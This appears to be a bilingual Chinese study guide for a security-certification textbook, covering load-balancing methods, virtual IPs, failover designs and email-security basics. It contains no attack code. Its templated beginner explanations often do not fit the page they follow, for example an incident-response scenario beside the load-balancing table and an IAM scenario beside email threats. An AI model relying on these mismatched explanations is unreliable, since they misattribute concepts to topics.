容量管理是规划、监控和优化网络容量的实践,以确保其能够有效应对当前和 未来的需求。 通过监控资源使用情况并预测未来需求,管理员可以合理分配资 源,防止性能下降,并确保可扩展性。 故障检测与处理涉及识别和解决网络中的问题、错误或故障。 目标是尽可能早 地发现故障,最小化停机时间,并实施容错和弹性策略。 自动警报和通知有助 于及时响应故障。 网络中的监控与管理涵盖网络可观测性、流量流/整形、容量管理以及故障检测 与处理等相关实践。 这些实践共同有助于维护健康高效的网络基础设施,确保 其满足性能预期、具备故障弹性并能适应变化的需求。 先进的工具和技术,如 网络监控软件、流量整形机制和预测性分析,在现代网络环境中实施有效的监 控与管理策略中发挥着关键作用。 负载均衡 负载均衡的目的是负载均衡以获得更优的基础设施利用率,最小化响应时间, 最大化吞吐量,减少过载并消除瓶颈。 负载均衡器用于在多个网络链路或网 络设备之间分散或分配网络流量负载。 尽管负载均衡可用于多种场景,但常 见的实现方式是在服务器集群或服务器农场的多个成员之间分配负载。 调度 或负载均衡方法是指负载均衡器如何在其后端设备之间分配工作、请求或负 载。

负载均衡器可能使用多种调度技术来执行负载分配,如表12.1所示。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 23 / PDF P860

第 860 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

TABLE 12.1 Common load-balancing scheduling techniques Technique Description Random choice Each packet or connection is assigned a destination randomly. Round robin Each packet or connection is assigned the next destination in order, such as 1, 2, 3, 4, 5, 1, 2, 3, 4, 5, and so on. Load monitoring Each packet or connection is assigned a destination based on the current load or capacity of the targets. The device/path with the lowest current load receives the next packet or connection. Preferencing or weighted Each packet or connection is assigned a destination based on a subjective preference or known capacity difference.

For example, suppose system 1 can handle twice the capacity of systems 2 and 3; in this case, preferencing would look like 1, 2, 1, 3, 1, 2, 1, 3, 1, and so on. Least connections/traffic/latency Each packet or connection is assigned a destination based on the least number of active connections, traffic load, or latency. Locality based (geographic) Each packet or connection is assigned a destination based on the destination's relative distance from the load balancer (used when cluster members are geographically separated or across numerous router hops).

Locality based (affinity) Each packet or connection is assigned a destination based on previous connections from the same client, so subsequent requests go to the same destination to optimize continuity of service. Aka persistence. Load balancing can be either a software service or a hardware appliance. Load balancing can also incorporate many other features, depending on the protocol or application, including caching, TLS offloading, compression, buffering, error checking, filtering, and even firewall and IDS capabilities.

中文直译 / 整理

表 12.1 常见的负载均衡调度技术 技术 描述 随机选择 每个数据包或连接都被随机分配一个目标。 轮询 每个数据包或连接按顺序分配下一个目标,例 如 1、2、3、4、5、1、2、3、4、5,依此类推。 负载监控 每个数据包或连接根据目标的当前负载或容量分 配目的地。 当前负载最低的设备/路径将接收下一 个数据包或连接。 偏好或加权 每个数据包或连接根据主观偏好或已知容量差异 分配目的地。 例如,假设系统 1 的容量是系统 2 和系统 3 的两倍; 在这种情况下,偏好分配模 式将类似于 1、2、1、3、1、2、1、3、1,依此 类推。 最少 连接/流量/延迟 每个数据包或连接根据最少的活动 连接、流量负载或延迟分配目标 连接、流量负载或延迟。 基于位置(地 理) 每个数据包或连接根据目标与负载均衡器之间的 相对距离分配目标(当集群成员在地理上分离或 跨越多个路由器跳数时使用)。 基于本地性(亲和性) 每个数据包或连接都会根据来自同一客户端的先 前连接分配目标,以便后续请求发送到相同的目 标,以优化服务的连续性。 也称为持久性。 负载均衡可以是软件服务,也可以是硬件设备。

根据协议或应用程序的不同, 负载均衡还可以包含许多其他功能,包括缓存、TLS卸载、压缩、缓冲、错误 检查、过滤,甚至防火墙和IDS功能。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 860 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 24 / PDF P861

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

TLS offloading is the process of removing the TLS-based encryption from incoming traffic to relieve a web server of the processing burden of decrypting and/or encrypting traffic sent. Virtual IP Addresses In load-balancing scenarios, virtual IP addresses (VIP or VIPA) serve as key components to efficiently distribute incoming network traffic across multiple servers or resources. Unlike a physical IP address associated with a specific network interface, a VIP is mapped to a cluster or group of servers.

When clients access the VIP, a load balancer directs their requests to one of the servers in the pool, ensuring that the overall load is evenly distributed and preventing any single server from becoming a bottleneck. Load balancers utilize virtual IP addresses as the entry point for incoming traffic, making decisions on how to distribute the load based on defined algorithms or balancing schedules. The result is an optimized distribution of client requests across the backend servers, contributing to efficient resource utilization. One significant advantage of virtual IP addresses in load balancing is their role in enhancing high availability.

In the event of a server failure, the load balancer can seamlessly redirect traffic to other healthy servers, minimizing downtime and ensuring continuous service availability. This redundancy and failover capability are crucial for maintaining uninterrupted service in dynamic and scalable environments. Virtual IP addresses also facilitate scalability by allowing the dynamic addition or removal of servers in response to changes in infrastructure size. As the system scales, load balancers adapt to the evolving server pool, and clients can access the service through the virtual IP address without being affected by modifications in the backend server configuration.

Load balancers often handle SSL/TLS termination at the virtual IP address, decrypting incoming encrypted traffic before distributing it to backend servers. Additionally, virtual IP addresses can be associated with content switching, enabling the load balancer to route traffic based on content types or specific application services. TLS

中文直译 / 整理

卸载是指移除传入流量中的TLS加密,以减轻Web服务器解密和/或 加密流量的处理负担。 虚拟IP地址 在负载均衡场景中,虚拟IP地址(VIP或VIPA)是高效分配传入网络流量到多 个服务器或资源的关键组件。 与关联到特定网络接口的物理IP地址不同, VIP被映射到一个服务器集群或组。 当客户端访问VIP时,负载均衡器会将其 请求定向到池中的某台服务器,从而确保整体负载均匀分布,防止任何单台服 务器成为瓶颈。 负载均衡器将虚拟IP地址作为传入流量的入口点,根据预定义的算法或均衡策 略决定如何分发负载。 其结果是客户端请求在后端服务器之间得到优化分配, 有助于提高资源利用率。 虚拟IP地址在负载均衡中的一个重要优势是其在提升高可用性方面的作用。 当 服务器发生故障时,负载均衡器可以无缝地将流量重定向到其他健康的服务器, 最大限度地减少停机时间并确保服务持续可用。 这种冗余和故障转移能力对于 在动态且可扩展的环境中维持不间断服务至关重要。 虚拟IP地址还通过允许根据基础设施规模的变化动态添加或移除服务器来促 进可扩展性。

随着系统扩展,负载均衡器会适应不断变化的服务器池,客户 端可以通过虚拟IP地址访问服务,而不会受到后端服务器配置更改的影响。 负载均衡器通常在虚拟 IP 地址处处理 SSL/TLS 终止,在将传入的加密流量 分发到后端服务器之前对其进行解密。 此外,虚拟 IP 地址可以与内容切换相 关联,使负载均衡器能够根据内容类型或特定应用程序服务来路由流量。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
学习单元 25 / PDF P862

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

In Global Server Load Balancing (GSLB) scenarios, virtual IP addresses play a crucial role in distributing traffic across multiple data centers or locations on a global scale. This approach considers factors such as proximity, server health, or other criteria to optimize both performance and reliability on a global level. Virtual IP addresses are fundamental in load balancing architectures, providing a versatile and efficient mechanism for directing incoming traffic to backend servers. Their role spans from optimizing resource utilization and enhancing high availability to supporting scalability and global server load balancing. Active-Active vs.

Active-Passive An active-active system is a form of load balancing that uses all available pathways or systems during normal operations. In the event of a failure of one or more of the pathways, the remaining active pathways must support the full load that was previously handled by all. This technique is used when the traffic levels or workload during normal operations need to be maximized (i.e., optimizing availability), but reduced capacity will be tolerated during adverse conditions (i.e., reducing availability). An active-passive system is a form of load balancing that keeps some pathways or systems in an unused dormant state during normal operations.

If one of the active elements fails, then a passive element is brought online and takes over the workload for the failed element. This technique is used when the level of throughput or workload needs to be consistent between normal states and adverse conditions (i.e., maintaining availability consistency). Manage Email Security Email is one of the most widely and commonly used Internet services. The email infrastructure employed on the Internet primarily consists of email servers using Simple Mail Transfer Protocol (SMTP) (TCP port 25) to accept messages from clients, transport those messages to other servers, and deposit them into a user's server-based inbox.

In addition to email servers, the email infrastructure includes email clients. Clients retrieve email from their serverbased inboxes using Post Office Protocol version 3 (POP3) (TCP port 110) or Internet Message Access Protocol (IMAP) (technically version 4) (TCP port 143). Internet-compatible email systems rely on the X.400 standard for addressing and message handling.

中文直译 / 整理

在全局服务器负载均衡(GSLB)场景中,虚拟 IP 地址在跨多个数据中心或全 球范围内的位置分发流量方面发挥着关键作用。 这种方法考虑了距离、服务器 健康状况或其他因素,以优化全球范围内的性能和可靠性。 虚拟IP地址在负载均衡架构中至关重要,提供了一种灵活高效的机制,用于将 传入流量导向后端服务器。 其作用涵盖优化资源利用率、提升高可用性,以及 支持可扩展性和全球服务器负载均衡。 活动‑活动 vs. 活动‑被动 活动-活动系统是一种负载均衡形式,在正常操作期间使用所有可用路径或系统。 当一个或多个路径发生故障时,剩余的活动路径必须承担此前由所有路径处理 的全部负载。 此技术用于在正常操作期间需要最大化流量水平或工作负载(即 优化可用性)的场景,但在不利条件下可接受容量降低(即降低可用性)。 活动-被动系统是一种负载均衡形式,在正常操作期间将部分路径或系统保持在 未使用的休眠状态。 如果某个活动元素发生故障,则会启动一个被动元素并接 管故障元素的工作负载。 此技术用于在正常状态和不利条件下需要保持吞吐量 或工作负载一致性的场景(即维持可用性一致性)。 管理电子邮件安全 电子邮件是使用最广泛和最常见的互联网服务之一。

互联网上使用的电子邮件 基础设施主要由使用简单邮件传输协议(SMTP)(TCP端口25)接收客户端 消息、将这些消息传输到其他服务器并将它们存入用户服务器邮箱的电子邮件 服务器组成。 除了电子邮件服务器外,电子邮件基础设施还包括电子邮件客户 端。 客户端使用邮局协议第3版(POP3)(TCP端口110)或互联网消息访问协 议(IMAP)(技术上为版本4)(TCP端口143)从其基于服务器的邮箱中检 索电子邮件。 兼容互联网的电子邮件系统依赖X.400标准进行寻址和消息处理。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

标准:标准给出必须满足的最低要求。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

Minimum level、mandatory requirement 常对应 standard。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 26 / PDF P863

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Postfix is the most common SMTP server for Unix systems (replacing the previously popular Sendmail product), and Exchange is the most common SMTP server for Microsoft systems. In addition to these popular products, numerous alternatives exist, but they all share the same basic functionality and compliance with Internet email standards. If you deploy an SMTP server, it is imperative that you properly configure strong authentication for both inbound and outbound mail. SMTP is designed to be a mail relay system. This means it relays mail from the sender to the intended recipient.

However, you want to avoid turning your SMTP server into an open relay (also known as an open relay agent or relay agent), which is an SMTP server that does not authenticate senders before accepting and relaying mail. Open relays are prime targets for spammers because they allow spammers to send out floods of emails by piggybacking on an insecure email infrastructure. As open relays are locked down—becoming closed relays or authenticated relays—adversaries are often resorting to hijacking authenticated user accounts through social engineering or credential stuffing/spraying/guessing attacks. Another option to consider for corporate email is an SaaS email solution.

Examples of cloud or hosted email include Gmail (Google Workspace) and Outlook/Exchange Online. SaaS email enables you to leverage the security experience and management expertise of some of the largest email service providers to support your company's communications. Benefits of SaaS email include high availability, distributed architecture, ease of access, standardized configuration, and physical location independence. However, there are some potential risks with using a hosted email solution, including block listing issues, rate limiting, app/add-on restrictions, and what (if any) additional security mechanisms you can deploy.

Email Security Goals The basic email mechanisms in use on the Internet offer efficient delivery of messages but lack controls to provide for confidentiality, integrity, or even availability. In other words, basic email is not secure. However, you can add security to email in many ways. Adding security to email may satisfy one or more of the following objectives: Restrict access to messages to their intended recipients (i.e., privacy and confidentiality). Postfix

中文直译 / 整理

是Unix系统中最常见的SMTP服务器(取代了之前流行的 Sendmail产品),而Exchange是Microsoft系统中最常见的SMTP服务器。 除了这些流行产品外,还存在许多替代方案,但它们都具有相同的基本功能 并符合互联网电子邮件标准。 如果您部署了SMTP服务器,则必须为入站和出站邮件正确配置强身份验证。 SMTP旨在作为邮件中继系统,这意味着它将邮件从发件人中继到预期收件人。 然而,您需要避免将您的SMTP服务器转变为开放中继(也称为开放中继代理 或中继代理),这是一种在接受和中继邮件前不验证发件人身份的SMTP服务 器。 开放中继是垃圾邮件发送者的首要目标,因为它们允许垃圾邮件发送者利 用不安全的邮件基础设施发送大量邮件。 随着开放中继被关闭——转变为封闭 中继或认证中继——攻击者常常转而通过社会工程或凭证填充/喷洒/猜测攻击劫 持已认证的用户账户。 企业邮件的另一个可选方案是SaaS邮件解决方案。 云邮件或托管邮件的例子包 括Gmail(Google Workspace)和Outlook/Exchange Online。

SaaS邮件 使您能够利用一些最大邮件服务提供商的安全经验和管理专长来支持公司的通 信。 SaaS邮件的优势包括高可用性、分布式架构、便捷访问、标准化配置和物 理位置独立性。 然而,使用托管邮件解决方案也存在一些潜在风险,包括被列 入黑名单、速率限制、应用/附加组件限制,以及您能够部署的任何额外安全机 制(如果有)。 电子邮件安全目标 互联网上使用的基本电子邮件机制能够高效地传递消息,但缺乏确保机密性、 完整性甚至可用性的控制措施。 换句话说,基本电子邮件是不安全的。 然而, 您可以通过多种方式为电子邮件添加安全性。 为电子邮件添加安全性可以满足 以下一个或多个目标: 将消息访问权限限制给预期的收件人(即隐私和机密性)。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
标准 标准给出必须满足的最低要求。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 27 / PDF P864

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Maintain the integrity of messages. Authenticate and verify the source of messages. Provide for nonrepudiation. Verify the delivery of messages. Classify sensitive content within or attached to messages. There is no real method to guarantee the availability of email, such as access to an inbox or assured delivery. However, these can be compensated for using verified delivery and maintaining several access vectors from clients to email servers (such as LAN, general Internet, and mobile data services). As with any aspect of IT security, email security begins in a security policy approved by upper management.

Within the security policy, you must address several issues: Acceptable use policies for email Access control and privacy Email management Email backup and retention policies Acceptable use policies define what activities can and cannot be performed over an organization's email infrastructure. It is often stipulated that professional, business-oriented emails and a limited amount of personal emails can be sent and received through company-owned or provided email systems.

Specific restrictions are usually placed on performing personal business (i.e., work for another organization, including self-employment) and sending or receiving illegal, immoral, or offensive communications as well as engaging in any other activities that would have a detrimental effect on productivity, profitability, or public relations. Access control over email should be maintained so that users have access only to their specific inbox and email archive databases. An extension of this rule implies that no other user, authorized or not, can gain access to an individual's email.

Access control should provide for both legitimate access and some level of privacy, at least from other employees and unauthorized intruders.

中文直译 / 整理

保持消息的完整性。 对消息的来源进行身份验证和确认。 提供不可否认性性。 验证消息的送达。 对消息内或附加的消息中的敏感内容进行分类。 没有真正的方法可以保证电子邮件的可用性,例如访问收件箱或确保投递。 然 而,可以通过验证投递以及维护客户端到电子邮件服务器的多个访问通道(如 局域网、通用互联网和移动数据服务)来弥补这些不足。 与任何IT安全方面一样,电子邮件安全始于高层管理人员批准的安全策略。 在 安全策略中,您必须解决以下几个问题: 电子邮件可接受使用政策 访问控制与隐私 电子邮件管理 电子邮件备份与保留政策 可接受使用政策规定了在组织的电子邮件基础设施上允许和禁止的活动。 通常 规定,专业性、业务导向的电子邮件以及有限数量的个人电子邮件可以通过公 司拥有或提供的电子邮件系统发送和接收。 通常会对从事个人业务(即为其他 组织工作,包括自雇)以及发送或接收非法、不道德或冒犯性通信,以及从事 任何可能对生产力、盈利能力或公共关系产生不利影响的其他活动施加具体限 制。 应加强对电子邮件的访问控制,确保用户仅能访问其特定的收件箱和电子邮件 归档数据库。

这一规则的延伸意味着,任何其他用户,无论是否获得授权,均 不得访问个人的电子邮件。 访问控制应同时保障合法访问和一定程度的隐私, 至少防止其他员工和未经授权的入侵者访问。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
保留期限 保留期限规定数据、日志或记录要保存多久。
身份 身份是主体在系统中的标识。
学习单元 28 / PDF P865

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

The mechanisms and processes used to implement, maintain, and administer email for an organization should be clarified. End users may not need to know the specifics of email management, but they do need to know whether email is considered private communication. Email has recently been the focus of numerous court cases in which archived messages were used as evidence—often to the chagrin of the author or recipient of those messages. If email is to be retained (that is, backed up and stored in archives for future use), users need to be made aware of this. If email is to be reviewed for violations by an auditor, users need to be informed of this as well.

Some companies have elected to retain only the last three months of email archives before they are destroyed, whereas others have opted to retain email for years. Depending on your country and industry, there are often regulations that dictate retention policies. But keep in mind, that although your organization may discard sent or received messages after only a few months, external entities may retain their copies of the conversations for years.

The details of an email retention policy may need to be shared with affected subjects, which may include privacy implications, how long the messages are maintained, and for what purposes the messages can be used (such as auditing or violation investigations). Understand Email Security Issues The first step in deploying email security is to recognize the vulnerabilities specific to email. The standard protocols used to support email (i.e., SMTP, POP3, and IMAP) do not employ encryption natively. Thus, all messages are transmitted in the form in which they are submitted to the email server, which is often plaintext. This makes interception and eavesdropping easy.

Email is a common delivery mechanism for viruses, worms, Trojan horses, documents with destructive macros, and other malicious code. The proliferation of support for various scripting languages, auto-download capabilities, and auto-execute features has transformed hyperlinks within the content of email and attachments into a serious threat to every system. Many email clients now natively support HTML code (and thus JavaScript), which may be rendered automatically when a message is accessed. Email offers little in the way of native source verification. Spoofing the source address of an email is a simple process for even a novice attacker.

Email headers can be modified at their source or at any point during transit. Furthermore, it is also possible to deliver email directly to a user's inbox on

中文直译 / 整理

应明确用于实施、维护和管理组织电子邮件的机制和流程。 最终用户可能无需 了解电子邮件管理的具体细节,但他们需要知道电子邮件是否被视为私人通信。 电子邮件最近成为众多法庭案件的焦点,这些案件中存档的邮件被用作证据—— 常常令邮件的发送者或接收者感到不满。 如果要保留电子邮件(即备份并存档 以备将来使用),则必须告知用户这一点。 如果审计人员需要审查电子邮件以 查找违规行为,也必须告知用户。 一些公司选择在销毁前仅保留最近三个月的 邮件存档,而另一些公司则选择保留多年。 根据您所在国家和行业,通常有法 规规定了保留政策。 但请记住,尽管您的组织可能在仅数月后就丢弃发送或接 收的邮件,外部实体仍可能保留其对话副本多年。 电子邮件保留政策的细节可 能需要与相关方共享,这可能涉及隐私影响、邮件保存时长以及邮件的使用目 的(例如审计或违规调查)。 了解电子邮件安全问题 部署电子邮件安全的第一步是识别电子邮件特有的漏洞。 用于支持电子邮件 的标准协议(即 SMTP、POP3 和 IMAP)本身不使用加密。 因此,所有邮 件均以提交至邮件服务器时的原始形式传输,通常是明文。 这使得拦截和窃 听变得轻而易举。

电子邮件是病毒、蠕虫、木马、包含破坏性宏的文档及其他恶意代码的常见传 播途径。 各种脚本语言支持、自动下载功能和自动执行功能的普及,已使电子 邮件内容和附件中的超链接成为对所有系统的严重威胁。 许多电子邮件客户端 现已原生支持 HTML 代码(以及 JavaScript),在访问邮件时可能自动渲染。 电子邮件在原生源验证方面作用甚微。 即使是新手攻击者,伪造电子邮件的源地址也是 一个简单的过程。 电子邮件头可以在源端或传输过程中的任何一点被修改。 此外,还可 以直接通过连接到电子邮件服务器的SMTP端口将邮件发送到用户的收件箱中

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
保留期限 保留期限规定数据、日志或记录要保存多久。
